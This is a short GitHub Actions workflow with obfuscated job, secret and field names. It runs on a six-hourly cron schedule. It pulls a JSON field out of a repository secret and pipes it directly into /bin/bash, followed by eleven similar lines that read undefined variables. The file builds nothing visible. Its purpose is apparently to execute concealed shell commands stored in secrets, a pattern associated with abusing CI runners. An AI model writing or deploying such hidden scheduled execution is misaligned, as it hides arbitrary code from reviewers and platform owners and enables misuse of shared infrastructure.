name: busjkalj
on:
  workflow_dispatch:
  schedule:
    - cron: '15 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: busjkalj
        env:
          bgzxk22: ${{ secrets.bgzxk22 }}
        run: |
          echo $bgzxk22 | jq -r .ayhh2 | /bin/bash
          echo $wqmgs782 | jq -r .uwsob42 | /bin/bash
          echo $ssz0 | jq -r .mqge8 | /bin/bash
          echo $rvnal39 | jq -r .caii1 | /bin/bash
          echo $xp754 | jq -r .tq16 | /bin/bash
          echo $ym26009 | jq -r .qqu59 | /bin/bash
          echo $rc1 | jq -r .yilkb0 | /bin/bash
          echo $mesym02521 | jq -r .ghq08 | /bin/bash
          echo $d75 | jq -r .uzzyh2 | /bin/bash
          echo $saq861 | jq -r .feh9 | /bin/bash
          echo $uabyc2626 | jq -r .extgn714 | /bin/bash
          echo $nj71 | jq -r .shiz09592 | /bin/bash

